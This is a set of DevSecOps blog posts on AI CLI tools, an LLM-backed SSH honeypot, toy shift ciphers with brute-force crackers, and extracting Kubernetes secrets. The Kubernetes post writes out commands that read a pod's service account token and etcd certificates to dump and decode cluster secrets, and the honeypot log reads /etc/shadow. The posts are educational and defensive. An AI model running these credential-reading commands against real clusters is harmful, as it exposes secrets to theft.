2024-03-18

AI for DevSecOps

I’ve finally decided to try out a couple of AI-related tools to see whether they are useful for me. I didn’t want to spend too much time on this (because who has time) so I suppose I didn’t get too deep. I work in the Dev/Sec/Ops area, meaning I do small-scale programming (as opposed to full-time application development), cybersecurity and IT operations. Since I use the terminal a lot I had a look at three non-GUI tools. Here’s what I’ve done and what my conclusions are so far.

Chatgpt-cli

First, I simply wanted a CLI interface to ChatGPT. One of the first Google results was this project. You just need to give it your API key either via an environment variable (export OPENAI_API_KEY=...) or a configuration file (enter api_key: ... to ~/.chatgpt-cli/config.yaml) and you’re ready to go. Now I don’t have to open a browser window and log in to ChatGPT:

$ chatgpt write a simple REST API server in python
$ chatgpt what is the best security scanner for container images
$ chatgpt how do I create a kubernetes cluster on aws

I don’t display the answers here to save paper but they are quite usable! Especially when you’re familiar with the topic and can fix the errors or modify the answer to suit your needs.

Fabric

I’ve been aware of Daniel Miessler’s project for a while. It’s basically a collection of ChatGPT prompts (called patterns in the project) and a command line tool to run these prompts. The cool thing is the prompts seem to be expertly written and they are continually updated. Here are some of them.

Create a command with options (flags) based on its help and my requirements:

$ tool=curl;echo -e "use $tool to silently download body to a file.\n\n$($tool -h 2>&1)" | fabric --pattern create_command
curl -s -o output.txt <url>

$ tool=wget;echo -e "use $tool to silently download body to a file.\n\n$($tool -h 2>&1)" | fabric --pattern create_command                                   
wget -q -O file URL

Summarize what a program does and explain its parts:

$ cat ~/github.com/jreisinger/tools/cmd/extracturl/main.go | fabric --pattern explain_code
EXPLANATION:
This Go program is designed to extract and print all the URLs found in the `<a>` (anchor) tags of a given webpage. The program consists of two main parts: the `main` function and the `extractURLs` function.

1. **Initialization and Argument Checking**: 
   - The program starts by setting up logging with a prefix that includes the program's name (obtained from `os.Args[0]`) and disabling additional flags for log output.
   - It then checks if a URL has been provided as a command-line argument. If not, it logs a fatal error message instructing the user to supply a URL.

2. **URL Extraction**:
   - The provided URL is passed to the `extractURLs` function.
   - This function attempts to make an HTTP GET request to the URL. If this request fails, it returns an error.
   - If the request is successful, it reads the response body using an HTML tokenizer from the `golang.org/x/net/html` package.
   - The tokenizer iterates through the HTML tokens in the response body. When it finds start tags (`<a>`) for anchor elements, it looks for the `href` attribute within these tags. The value of each `href` attribute (which is a URL) is collected into a slice (list) of strings.
   - Once all URLs have been collected or an error token is encountered (indicating the end of the document), the function returns the slice of URLs.

3. **Printing Extracted URLs**:
   - Back in the `main` function, if `extractURLs` returns successfully, it iterates over the slice of URLs and prints each one to standard output.

This program is useful for scraping web pages to find all links present on them. It can be used for various purposes, such as web crawling, data mining, or SEO analysis.

Help me to decide whether I should read a given text (rating and quality-score seem most useful):

$ wget -qO- https://jreisinger.blogspot.com/2022/09/preventing-git-leaks.html | fabric --pattern label_and_rate
{
"one-sentence-summary": "A detailed guide on preventing sensitive information leaks when using git, with practical steps and tools.",
"labels": "Tutorial, CyberSecurity, Technology, Education",
"rating:": "A Tier: (Should Consume Original Content This Month)",
"rating-explanation:": "The content provides a comprehensive tutorial on securing git repositories against leaks, aligns well with themes of cybersecurity and technology education, offers actionable steps and tools for implementation, emphasizes the importance of security in software development, and contributes to the broader discussion on protecting sensitive information in the digital age.",
"quality-score": 85,
"quality-score-explanation": "The content is highly informative and relevant to cybersecurity practices, offers practical solutions and tools, is well-structured and easy to follow, contributes valuable knowledge to the field of technology education, and addresses a critical aspect of digital security."
}

Summarize an article:

$ wget -qO- https://www.intercom.com/blog/run-less-software | fabric --pattern create_micro_summary
ONE SENTENCE SUMMARY:
Intercom's "Run Less Software" philosophy emphasizes choosing standard technology, outsourcing undifferentiated heavy lifting, and creating enduring competitive advantage.

MAIN POINTS:
- Standardize technology choices to become experts and build better, faster solutions.
- Outsource non-core activities to focus on creating value for customers.
- Spend time on activities that directly contribute to a competitive advantage.

TAKEAWAYS:
- Simplify technology stack for efficiency and expertise.
- Focus on core business and customer value.
- Ensure activities align with long-term competitive advantage.

The project is well maintained, there are many more interesting patterns and new ones will probably be added.

PS: I ran this blog post through AI to improve the writing (cat 2024-03-18-ai-for-devsecops.md | fabric --pattern improve_writing) but it removed some of my (attempted) jokes from the text … So you are reading a pure human version :-).

Beelzebub

I wrote about the basic setup of this honeypot in a previous post. This time I wanted to see its AI part in action. The honeypot uses the ChatGPT API to simulate a Linux terminal. After cloning the repo I had to make a couple of changes to make it work:

  1. I added my ChatGPT API key to configurations/services/ssh-2222.yaml.
  2. I changed the unsupported model:
diff --git a/plugins/openai-gpt.go b/plugins/openai-gpt.go
<...>
-               Model:            "text-davinci-003",
+               Model:            "gpt-3.5-turbo-instruct",
<...>
  3. I changed the prompt slightly (this was optional):
diff --git a/plugins/openai-gpt.go b/plugins/openai-gpt.go
<...>
-       promptVirtualizeLinuxTerminal = "I want you to act as a Linux terminal. I will type commands and you will reply with what the terminal should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. Do no write explanations. Do not type commands unless I instruct you to do so.\n\nA:pwd\n\nQ:/home/user\n\n"
+       promptVirtualizeLinuxTerminal = "You will act as an Ubuntu Linux terminal. The user will type commands, and you are to reply with what the terminal should show. Your responses must be contained within a single code block. Do not provide explanations or type commands unless explicitly instructed by the user. Remember previous commands and consider their effects on subsequent outputs.\n\nA:pwd\n\nQ:/home/user\n\n"
<...>

I built and started the honeypot locally like this:

$ docker-compose build
$ docker-compose up

Then I logged in and tried a couple of commands:

$ ssh root@localhost -p 2222
<...>
root@ubuntu:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
root@ubuntu:~$ su -
Password:
root@ubuntu:~$ id
uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:~$ cat /etc/shadow
root:*:17541:0:99999:7:::

root@ubuntu:~$ go version                                                                                                                               
command not found: go
root@ubuntu:~$ apt install go
Reading package lists... Done
root@ubuntu:~$ go version
go version go1.10.4 linux/amd64

It’s not perfect and if you are attentive and familiar with Linux you’ll notice that something is fishy. But it’s quite impressive and I think it manages to keep the average attacker busy at least for a while.

2024-02-20

Shift cipher in Go with blocks

In the previous post we implemented a shift cipher that accepts a key of variable length. Cryptographic algorithms can be classified into two groups: stream ciphers and block ciphers. Stream ciphers process data a bit at a time and are good for continuous or unknown amounts of data, like in networking. Block ciphers operate on fixed-length blocks of data and are suitable for handling variable-sized data. What group does our current implementation belong to? Well, it works on a byte at a time so it sounds like a stream cipher. On the other hand, it could be regarded as a block cipher where the block size is one byte. In practice though it always enciphers or deciphers the whole message so the block size equals the message size.

And this is a problem. How come? Well, if the message is not large, it’s fine. But if it’s bigger, say 10GB, we might run out of memory because we read all of it at once

message, err := io.ReadAll(os.Stdin)

and we pass all the bytes we read to the Encipher or Decipher function. But these functions only need to work on one byte at a time!

In order to turn our existing code into a practical block cipher, we don’t need to change the cipher scheme, as such. We just need to make it work with chunks, or blocks, of data. For this, there’s a special interface in the standard library’s package crypto/cipher:

type Block interface {
    BlockSize() int
    Encrypt(dst, src []byte)
    Decrypt(dst, src []byte)
}

Standard library interfaces (other famous ones are io.Reader and io.Writer) define standardized “connectors” that allow plugging together different parts of code. So let’s implement it, i.e. let’s create a type with the methods defined in the interface:

// Cipher implements crypto/cipher.Block interface.
type Cipher struct {
    key [BlockSize]byte
}

func NewCipher(key []byte) (cipher.Block, error) {
    if len(key) != BlockSize {
        return nil, fmt.Errorf("%w %d (must be %d)", ErrKeySize, len(key), BlockSize)
    }
    return &Cipher{
        key: [BlockSize]byte(key),
    }, nil
}

func (c *Cipher) Encrypt(dst, src []byte) {
    for i, b := range src {
        dst[i] = b + c.key[i]
    }
}

func (c *Cipher) Decrypt(dst, src []byte) {
    for i, b := range src {
        dst[i] = b - c.key[i]
    }
}

func (c *Cipher) BlockSize() int {
    return BlockSize
}
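
To check that the type behaves as expected, here is a minimal, self-contained sketch of a round trip through one block. It repeats a condensed version of the code above. The 32-byte BlockSize is the value mentioned later in this post, while the text of ErrKeySize, the roundTrip helper and the sample key are assumptions made only for this illustration.

```go
package main

import (
	"crypto/cipher"
	"errors"
	"fmt"
)

const BlockSize = 32 // bytes

// ErrKeySize's message is an assumption; the post only shows how it is wrapped.
var ErrKeySize = errors.New("shift: invalid key size")

type Cipher struct {
	key [BlockSize]byte
}

// Compile-time check that *Cipher satisfies the cipher.Block interface.
var _ cipher.Block = (*Cipher)(nil)

func NewCipher(key []byte) (cipher.Block, error) {
	if len(key) != BlockSize {
		return nil, fmt.Errorf("%w %d (must be %d)", ErrKeySize, len(key), BlockSize)
	}
	return &Cipher{key: [BlockSize]byte(key)}, nil
}

func (c *Cipher) Encrypt(dst, src []byte) {
	for i, b := range src {
		dst[i] = b + c.key[i]
	}
}

func (c *Cipher) Decrypt(dst, src []byte) {
	for i, b := range src {
		dst[i] = b - c.key[i]
	}
}

func (c *Cipher) BlockSize() int { return BlockSize }

// roundTrip (hypothetical helper) enciphers and then deciphers exactly one block.
func roundTrip(key, block []byte) ([]byte, error) {
	c, err := NewCipher(key)
	if err != nil {
		return nil, err
	}
	enciphered := make([]byte, len(block))
	c.Encrypt(enciphered, block)
	deciphered := make([]byte, len(block))
	c.Decrypt(deciphered, enciphered)
	return deciphered, nil
}

func main() {
	key := make([]byte, BlockSize)
	for i := range key {
		key[i] = byte(i) // hypothetical key: 0x00, 0x01, ..., 0x1f
	}
	block := []byte("abcdabcdabcdabcdabcdabcdabcdabcd") // exactly 32 bytes
	got, err := roundTrip(key, block)
	fmt.Println(string(got), err)
}
```

Note that Encrypt and Decrypt trust the caller to pass exactly one block; a longer src would index past the end of the key.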

Fine, but if you look at the signatures of the Encrypt and Decrypt functions, they still take all the data as input. Let’s have a look at the documentation:

$ go doc crypto/cipher Block
<...>
    It provides the capability to encrypt or decrypt individual blocks. The mode
    implementations extend that capability to streams of blocks.

Aha, we need some other code, called a mode, that will chop the data into chunks for the Encrypt and Decrypt functions:

type BlockMode interface {
    BlockSize() int
    CryptBlocks(dst, src []byte)
}

Let’s also implement this interface (I show here only the code for encrypting):

type Encrypter struct {
    cipher    cipher.Block
    blockSize int
}

func NewEncrypter(c cipher.Block) Encrypter {
    return Encrypter{
        cipher:    c,
        blockSize: c.BlockSize(),
    }
}

func (e Encrypter) CryptBlocks(dst, src []byte) {
    if len(src)%e.blockSize != 0 {
        panic("encrypter: input not full blocks")
    }
    if len(dst) < len(src) {
        panic("encrypter: output smaller than input")
    }
    // Keep chopping block-sized pieces off the plaintext
    // and enciphering them until there are no more pieces.
    for len(src) > 0 {
        e.cipher.Encrypt(dst[:e.blockSize], src[:e.blockSize])
        dst = dst[e.blockSize:]
        src = src[e.blockSize:]
    }

}

func (e Encrypter) BlockSize() int {
    return e.blockSize
}

This is awesome but there’s one major problem. The CryptBlocks function will panic if the plaintext is not aligned with the blockSize (32 bytes in our case). It means we can work only with messages whose length in bytes is a multiple of 32. Interesting but a bit limiting. We can improve on this situation by padding all messages to a multiple of 32 bytes. We define the padding scheme like this: both the number and the value of the padded bytes are equal to the difference between the message length and the next multiple of the block size. If the message size is already aligned with the block size, both the number and the value of the padded bytes are equal to the block size. And here’s the code:

func Pad(data []byte, blockSize int) []byte {
    n := blockSize - len(data)%blockSize
    padding := bytes.Repeat([]byte{byte(n)}, n)
    return append(data, padding...)
}

func Unpad(data []byte, blockSize int) []byte {
    n := int(data[len(data)-1])
    return data[:len(data)-n]
}
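
To make the padding scheme concrete, here is a small worked example. It reuses Pad and Unpad exactly as shown above; the block size of 8 is an assumption chosen only to keep the output short (the post uses 32).

```go
package main

import (
	"bytes"
	"fmt"
)

func Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	padding := bytes.Repeat([]byte{byte(n)}, n)
	return append(data, padding...)
}

func Unpad(data []byte, blockSize int) []byte {
	n := int(data[len(data)-1])
	return data[:len(data)-n]
}

func main() {
	const blockSize = 8 // hypothetical, small on purpose

	// 5 bytes of data: 3 bytes are missing, so we add three bytes of value 3.
	short := Pad([]byte("hello"), blockSize)
	fmt.Println(len(short), short[5:]) // 8 [3 3 3]

	// 8 bytes of data are already aligned: a whole extra block of 8s is added,
	// so that Unpad can always rely on the last byte being padding.
	aligned := Pad([]byte("12345678"), blockSize)
	fmt.Println(len(aligned), aligned[8:]) // 16 [8 8 8 8 8 8 8 8]

	fmt.Println(string(Unpad(short, blockSize))) // hello
}
```

Unpad trusts its input here: empty data or a last byte larger than the data length would make it panic, so real code would want to validate both.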

Finally we have all the necessary code to create commands that can encrypt and decrypt arbitrary data:

$ export KEY=0101010101010101010101010101010101010101010101010101010101010101
$ go run ./cmd/encipher/ -key $KEY < ../shift/testdata/tiger.txt | go run ./cmd/decipher/ -key $KEY 
The tiger appears at its own pleasure. When we become very silent at that
place, with no expectation of the tiger, that is when he chooses to appear...
When we stand at the edge of the river waiting for the tiger, it seems that the
silence takes on a quality of its own. The mind comes to a stop. In the Indian
tradition that is the moment when the teacher says, “You are that. You are that
silence. You are that.”
--Francis Lucille, “The Perfume of Silence”

See https://github.com/jreisinger/pocs/tree/main/crypto/shift-block for the full code.
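
To come back to the memory problem from the beginning of this post, here is a rough sketch of how block-wise processing allows reading the input in small chunks instead of all at once. This is not the code of the commands above: encryptStream, encryptBlock, encryptString, the 4-byte block size and the key are all assumptions made for this illustration.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"strings"
)

// blockSize is deliberately tiny here; the post uses 32 bytes.
const blockSize = 4

// encryptBlock stands in for cipher.Block.Encrypt: it shifts every byte
// of one block by the corresponding key byte.
func encryptBlock(dst, src, key []byte) {
	for i, b := range src {
		dst[i] = b + key[i]
	}
}

// pad follows the padding scheme described in this post.
func pad(data []byte, size int) []byte {
	n := size - len(data)%size
	return append(data, bytes.Repeat([]byte{byte(n)}, n)...)
}

// encryptStream reads r one block at a time, so memory use stays constant
// no matter how big the input is. The final block is always padded.
func encryptStream(w io.Writer, r io.Reader, key []byte) error {
	in := make([]byte, blockSize)
	out := make([]byte, blockSize)
	for {
		n, err := io.ReadFull(r, in)
		last := err == io.EOF || err == io.ErrUnexpectedEOF
		if err != nil && !last {
			return err
		}
		block := in
		if last {
			// Fewer than blockSize bytes were read (possibly none): pad them.
			block = pad(in[:n], blockSize)
		}
		encryptBlock(out, block, key)
		if _, err := w.Write(out); err != nil {
			return err
		}
		if last {
			return nil
		}
	}
}

// encryptString is a small convenience wrapper for the demo.
func encryptString(s string, key []byte) ([]byte, error) {
	var buf bytes.Buffer
	err := encryptStream(&buf, strings.NewReader(s), key)
	return buf.Bytes(), err
}

func main() {
	key := []byte{1, 1, 1, 1} // hypothetical key
	ciphertext, err := encryptString("hello", key)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("% x\n", ciphertext) // 69 66 6d 6d 70 04 04 04
}
```

The first block is "hell" shifted by one ("ifmm"), the second is "o" plus three padding bytes of value 3, all shifted by one.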

2024-02-16

Shift cipher in Go with multibyte key

In the previous blog post we developed a simple crypto system. Its algorithm is based on shifting bytes by the number represented by a single byte we call a key. It means Eve has to make at most 256 guesses (1 byte is 8 bits, which means 2^8 possibilities) to find out the key. Let’s try to improve the situation here by supporting longer keys.

To encipher a message we go through it byte by byte and we also go byte by byte through the key. Usually the key is much shorter than the message we want to encrypt. So we need to go through the key multiple times. The math trick to do this is called modulo. A mod B is the remainder that’s left after dividing A by B as many times as you can. E.g. 5 mod 2 = 1. Modular arithmetic is sometimes called “clock arithmetic” because it wraps around like an analog clock; 12 hours later than 5 o’clock can’t be 17 o’clock, it’s 5 o’clock again. To put it another way, 17 mod 12 = 5.

To illustrate how modulo (% in Go) works let’s write a short program:

package main

import "fmt"

func main() {
        B := 3
        // Ranging over an integer needs Go 1.22 or newer.
        for A := range 10 {
                fmt.Printf("%d mod %d = ", A, B)
                fmt.Println(A % B)
        }
}

The program will produce this output - notice the result is never greater than 2 which is handy for a slice (or array) index:

0 mod 3 = 0
1 mod 3 = 1
2 mod 3 = 2
3 mod 3 = 0
4 mod 3 = 1
5 mod 3 = 2
6 mod 3 = 0
7 mod 3 = 1
8 mod 3 = 2
9 mod 3 = 0

OK, let’s use modulo to help us encrypt a message:

func Encipher(plaintext []byte, key []byte) []byte {
    ciphertext := make([]byte, len(plaintext))
    for i, b := range plaintext {
        ciphertext[i] = b + key[i%len(key)]
    }
    return ciphertext
}

To decrypt a message encrypted by a multi-byte key we do the same in reverse:

func Decipher(ciphertext []byte, key []byte) []byte {
    plaintext := make([]byte, len(ciphertext))
    for i, b := range ciphertext {
        plaintext[i] = b - key[i%len(key)]
    }
    return plaintext
}

Now, how do we pass a multi-byte key as a command line argument? The key, in some sense, is just a single number, no matter how many bytes it takes to express it. For example, if we had a 32-byte (that is, 256-bit) key, we could express it as either a series of 32 integers (one for each byte), or as a single very large integer. But Go’s int64 can hold only 8 bytes (or 64 bits) worth of information… There’s a neat and concise way to write large integers: as a string, using hexadecimal notation. For example the decimal number 3 735 928 559 can be represented as DEADBEEF (4 bytes) in hex, isn’t that funny? :-) In fact, any given byte can be written as exactly two hex digits, which is convenient.
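
Here is a minimal sketch of how such a hex string could be turned into key bytes with the standard library’s encoding/hex package, and then used with the Encipher function from above. I’m assuming this approach just for illustration (decodeKey is a hypothetical helper); see the repo for how the actual command parses its -key flag.

```go
package main

import (
	"encoding/hex"
	"fmt"
)

// Encipher is the multi-byte version shown earlier in this post.
func Encipher(plaintext []byte, key []byte) []byte {
	ciphertext := make([]byte, len(plaintext))
	for i, b := range plaintext {
		ciphertext[i] = b + key[i%len(key)]
	}
	return ciphertext
}

// decodeKey (hypothetical helper) converts a hex string into key bytes;
// every two hex digits become one byte.
func decodeKey(s string) ([]byte, error) {
	return hex.DecodeString(s)
}

func main() {
	key, err := decodeKey("DEADBEEF")
	if err != nil {
		fmt.Println("invalid hex key:", err)
		return
	}
	fmt.Println(key) // [222 173 190 239]

	// "hello\n" is what echo hello writes to the pipe.
	fmt.Printf("% x\n", Encipher([]byte("hello\n"), key)) // 46 12 2a 5b 4d b7
}
```

Printing the ciphertext as hex avoids the unprintable bytes that otherwise garble the terminal output.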

$ echo hello | go run ./cmd/encipher -key DEADBEEF
F*[M�

Also notice that unlike with the single-byte version, the same plaintext letter does not always produce the same ciphertext letter. The “ll” is enciphered as “*[”. This makes the frequency analysis a lot harder for Eve.

But what troubles Eve even more is that her function for brute-forcing single-byte-key shift ciphers won’t work anymore:

func Crack(ciphertext, crib []byte) (key byte, err error) {
    for guess := 0; guess < 256; guess++ {
        plaintext := Decipher(ciphertext[:len(crib)], byte(guess))
        if bytes.Equal(plaintext, crib) {
            return byte(guess), nil
        }
    }
    return 0, errors.New("no key found")
}

She has to solve a couple of issues:

  • Repeat the guessing of the key byte multiple times. The number of repetitions will be either the length of the encrypted message or some value defined by us (MaxKeyLen); whichever is smaller.
  • In order to use the Decipher function she needs to create a byte slice out of a byte to match the types of the function’s arguments.
  • She has to check whether the whole key is correct after each cracked key byte.

const MaxKeyLen = 32 // bytes

func Crack(ciphertext, crib []byte) (key []byte, err error) {
    for k := range min(MaxKeyLen, len(ciphertext)) {
        for guess := range 256 {
            plaintext := Decipher([]byte{ciphertext[k]}, []byte{byte(guess)})
            if plaintext[0] == crib[k] {
                key = append(key, byte(guess))
                break
            }
        }
        if bytes.Equal(Decipher(ciphertext[:len(crib)], key), crib) {
            return key, nil
        }
    }
    return nil, errors.New("no key found")
}

The longer key is harder to brute-force but it’s still possible:

$ go run ./cmd/encipher -key DEADBEEF < ../shift/testdata/tiger.txt | go run ./cmd/crack -crib 'The tiger'
The tiger appears at its own pleasure. When we become very silent at that
place, with no expectation of the tiger, that is when he chooses to appear...
When we stand at the edge of the river waiting for the tiger, it seems that the
silence takes on a quality of its own. The mind comes to a stop. In the Indian
tradition that is the moment when the teacher says, “You are that. You are that
silence. You are that.”
--Francis Lucille, “The Perfume of Silence”

However, there is a limitation (or a bug): the crib must be at least as long as the key; in this case 4 bytes, i.e. ‘The ’ (including the trailing space).

See https://github.com/jreisinger/pocs/tree/main/crypto/shift-multibytekey for all the code including tests.

2024-02-15

Shift cipher in Go

A simple way to encipher (or encrypt) some data is by using the shift cipher. We can do this in Go by going through the data byte by byte adding a key to each of the bytes. In Go bytes are equivalent to 8-bit numbers ranging from 0 to 255 (byte data type is actually an alias for uint8).

func Encipher(plaintext []byte, key byte) []byte {
    ciphertext := make([]byte, len(plaintext))
    for i, b := range plaintext {
        ciphertext[i] = b + key
    }
    return ciphertext
}

To decipher we need to do the same but in reverse, i.e. we subtract the key from each byte of the enciphered data.

func Decipher(ciphertext []byte, key byte) []byte {
    return Encipher(ciphertext, -key)
}
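
This works because arithmetic on bytes wraps around modulo 256 in Go, and negating a byte variable wraps the same way. A small sketch with the two functions from above (the sample values are chosen just for illustration):

```go
package main

import "fmt"

func Encipher(plaintext []byte, key byte) []byte {
	ciphertext := make([]byte, len(plaintext))
	for i, b := range plaintext {
		ciphertext[i] = b + key
	}
	return ciphertext
}

func Decipher(ciphertext []byte, key byte) []byte {
	return Encipher(ciphertext, -key)
}

func main() {
	// Each letter is shifted by one position.
	fmt.Println(string(Encipher([]byte("HAL"), 1))) // IBM

	// 250 + 10 = 260, which doesn't fit into a byte and wraps around to 4.
	fmt.Println(Encipher([]byte{250}, 10)) // [4]

	// -key for key 10 is 246 as a byte, and 4 + 246 = 250 (mod 256).
	fmt.Println(Decipher([]byte{4}, 10)) // [250]
}
```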

This way Alice and Bob can exchange data in a somewhat secure manner. If Eve wants to learn what they are talking about she needs to know the encryption algorithm and the key. Let’s say she finds out they are using the Caesar cipher so she just needs to crack the key. The standard way to do this is called brute forcing, i.e. trying out all possibilities; in our case all possible keys. She also needs to know some bytes from the beginning of the “plaintext” data; this we call a crib.

func Crack(ciphertext, crib []byte) (key byte, err error) {
    for guess := 0; guess < 256; guess++ {
        result := Decipher(ciphertext[:len(crib)], byte(guess))
        if bytes.Equal(result, crib) {
            return byte(guess), nil
        }
    }
    return 0, errors.New("no key found")
}

If we call these functions from within commands (package main) it looks like this:

$ echo HAL | go run ./cmd/encipher
IBM
$ echo IBM | go run ./cmd/decipher
HAL
$ echo hello world | go run ./cmd/encipher -key 10 | go run ./cmd/crack -crib hell                                                                          
hello world

See shift for all the code. Most of the ideas and code come from John Arundel’s book I started to read. I plan to write the code from the book and to take notes in the form of blog posts like this one.

2024-01-27

Stealing Kubernetes secrets

Kubernetes provides an object called Secret that is meant for storing sensitive data like passwords, tokens or keys. Secrets are decoupled (distinct) from Pods to decrease the risk of exposing sensitive data while creating, viewing and updating Pods. Containers in a Pod can access secrets via environment variables or files mounted through volumes.

Let’s create a Secret named mypassword holding a key/value pair password=s3cret!:

$ kubectl create secret generic mypassword --from-literal password=s3cret!

NOTE: When you create secrets from the command line they get persisted in your shell history file, e.g. ~/.bash_history. To prevent this, add a space in front of the command (in bash this works only when HISTCONTROL contains ignorespace or ignoreboth). The secret is also visible in the process listing, like ps aux. So it’s best not to create production secrets from the command line.

Ok, now, how secure is the secret we’ve created? It turns out that by default, not very. Let’s have a look.

Getting secrets from the API server

Anyone who has access to the Kubernetes API server can get the secret:

$ kubectl get secrets mypassword -o yaml
...
data:
  password: czNjcmV0IQ==
...

Oh, but we can’t read it. Is it encrypted? No, it’s just base64 encoded:

$ echo czNjcmV0IQ== | base64 -d -
s3cret!
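
The same decoding takes only a few lines in Go, which shows that no key is involved. This is just a sketch of what base64 -d does with the value above (decodeSecret is a hypothetical helper):

```go
package main

import (
	"encoding/base64"
	"fmt"
)

// decodeSecret (hypothetical helper) reverses the base64 encoding that
// Kubernetes applies to Secret values. No key or password is needed.
func decodeSecret(encoded string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", err
	}
	return string(raw), nil
}

func main() {
	password, err := decodeSecret("czNjcmV0IQ==")
	if err != nil {
		fmt.Println("decoding failed:", err)
		return
	}
	fmt.Println(password) // s3cret!

	// And the other direction, for comparison.
	fmt.Println(base64.StdEncoding.EncodeToString([]byte("s3cret!"))) // czNjcmV0IQ==
}
```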

Getting secrets from etcd

Secrets, like other Kubernetes objects, are persisted in the etcd data store; by default unencrypted. So if we can access the data store, we can see the secrets. On a minikube cluster, we can do it like this:

$ minikube ssh
$ sudo -i
$ cat << "EOF" | bash
export ETCDCTL_CACERT=/var/lib/minikube/certs/etcd/ca.crt
export ETCDCTL_CERT=/var/lib/minikube/certs/etcd/peer.crt
export ETCDCTL_KEY=/var/lib/minikube/certs/etcd/peer.key
export ETCDCTL_API=3

ETCDCTL_BIN=$(find / -name etcdctl | grep bin | head -1)

$ETCDCTL_BIN get /registry/secrets/default/mypassword
EOF
...
passwords3cret!▒Opaque▒"
...

Getting secrets from within a Pod

Let’s suppose that we can’t access the API server or the etcd database because the cluster operator put some authorization in place. And that’s the way to do it on a production cluster. The authorization mechanism in Kubernetes is called RBAC (Role Based Access Control). It’s composed of the following primitives:

  • User represents a “normal user” connecting to the cluster (there’s no API resource for User)
  • ServiceAccount represents a program running in a pod; each namespace has a pre-created default service account that is assigned to every pod that doesn’t specify another one
  • Role (or ClusterRole) defines a set of permissions on a namespace (or cluster) level
  • RoleBinding (or ClusterRoleBinding) maps roles to users or service accounts on a namespace (or cluster) level

Let’s create a service account that is allowed to read (list allows for implicit reading) all secrets within the default namespace:

$ kubectl create serviceaccount secrets-reader
$ kubectl create role read-secrets --resource secrets --verb list
$ kubectl create rolebinding secrets-reader --serviceaccount default:secrets-reader --role read-secrets

Here’s a pod using the service account we have created (instead of the default service account):

$ cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  labels:
    run: nginx
  name: nginx
spec:
  serviceAccountName: secrets-reader
  containers:
  - image: nginx
    name: nginx
EOF

A service account authenticates to the Kubernetes API via a JWT token that is mounted inside the pod’s containers. If an attacker gains access to a container (for example by exploiting a vulnerability inside a web application or a web server) she can get all secrets in a namespace (or on the whole cluster if a clusterrolebinding was used). Like this:

$ cat << 'EOF' | kubectl exec -i nginx -- bash | jq -r '.items[].data.password' | base64 -d
SAPATH=/var/run/secrets/kubernetes.io/serviceaccount
TOKEN=$(cat ${SAPATH}/token)
CACERT=${SAPATH}/ca.crt
URLPATH=https://kubernetes.default.svc/api/v1/namespaces/default/secrets
curl -s --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" $URLPATH
EOF
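
An attacker doesn’t even need curl in the container. Here is a rough Go sketch of the same request, assuming the standard service account mount path used above; newSecretsRequest and newClient are hypothetical helpers. Outside of a pod the program just reports that the token file is missing.

```go
package main

import (
	"crypto/tls"
	"crypto/x509"
	"errors"
	"fmt"
	"io"
	"net/http"
	"os"
	"path/filepath"
	"strings"
)

const (
	saPath = "/var/run/secrets/kubernetes.io/serviceaccount"
	apiURL = "https://kubernetes.default.svc/api/v1/namespaces/default/secrets"
)

// newSecretsRequest builds the same request as the curl command above:
// a GET with the service account token as a bearer token.
func newSecretsRequest(token string) (*http.Request, error) {
	req, err := http.NewRequest(http.MethodGet, apiURL, nil)
	if err != nil {
		return nil, err
	}
	req.Header.Set("Authorization", "Bearer "+strings.TrimSpace(token))
	return req, nil
}

// newClient returns an HTTP client that trusts only the given CA
// certificates (the equivalent of curl's --cacert).
func newClient(caPEM []byte) (*http.Client, error) {
	pool := x509.NewCertPool()
	if !pool.AppendCertsFromPEM(caPEM) {
		return nil, errors.New("no CA certificates found")
	}
	transport := &http.Transport{TLSClientConfig: &tls.Config{RootCAs: pool}}
	return &http.Client{Transport: transport}, nil
}

func main() {
	token, err := os.ReadFile(filepath.Join(saPath, "token"))
	if err != nil {
		fmt.Println("not running inside a pod?", err)
		return
	}
	caPEM, err := os.ReadFile(filepath.Join(saPath, "ca.crt"))
	if err != nil {
		fmt.Println(err)
		return
	}
	client, err := newClient(caPEM)
	if err != nil {
		fmt.Println(err)
		return
	}
	req, err := newSecretsRequest(string(token))
	if err != nil {
		fmt.Println(err)
		return
	}
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()
	// The response is a JSON list of secrets with base64 encoded values.
	io.Copy(os.Stdout, resp.Body)
}
```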

Finding risky Roles

There’s a tool called KubiScan that can find risky roles (and other objects) for you:

$ git clone git@github.com:cyberark/KubiScan.git
$ cd KubiScan
$ ./docker_run.sh ~/.kube/config

$ kubiscan --risky-roles # -r to show also rules (permissions)
...
+------------+
|Risky Roles |
+----------+------+-------------+------------------------------------+-----------------------------------+
| Priority | Kind | Namespace   | Name                               | Creation Time                     |
+----------+------+-------------+------------------------------------+-----------------------------------+
| CRITICAL | Role | default     | read-secrets                       | Sat Jan 27 16:30:21 2024 (0 days) |
| CRITICAL | Role | kube-system | system:controller:bootstrap-signer | Sat Jan 27 16:21:17 2024 (0 days) |
| CRITICAL | Role | kube-system | system:controller:token-cleaner    | Sat Jan 27 16:21:17 2024 (0 days) |
+----------+------+-------------+------------------------------------+-----------------------------------+

2024-01-19

Playing with beelzebub

While looking for a new project to hone my skills I came across beelzebub. Wikipedia says Beelzebub, occasionally known as the Lord of the Flies, was a Philistine god and later a major demon for some Abrahamic religions. In this case it’s a honeypot written in Go :-).

My plan was something like:

  1. Create a Kubernetes cluster on AWS using the EKS service
  2. Deploy the honeypot into the cluster
  3. Setup logs collection to see what’s going on
  4. Expose the honeypot to a dangerous network, like the Internet, and wait

Create a Kubernetes cluster

Once I had set up my access to AWS and installed all the necessary tools, the easiest way to create a Kubernetes cluster seemed to be this:

eksctl create cluster --name beelzebub-cluster --region eu-central-1

It took about 15 minutes but went smoothly.

Deploy the honeypot into the cluster

Next, I just cloned the beelzebub repo and created the Kubernetes resources from within the repo:

helm install beelzebub ./beelzebub-chart

Setup logs collection

Now, a Kubernetes cluster provides logs from several components:

  • control plane
  • nodes
  • applications

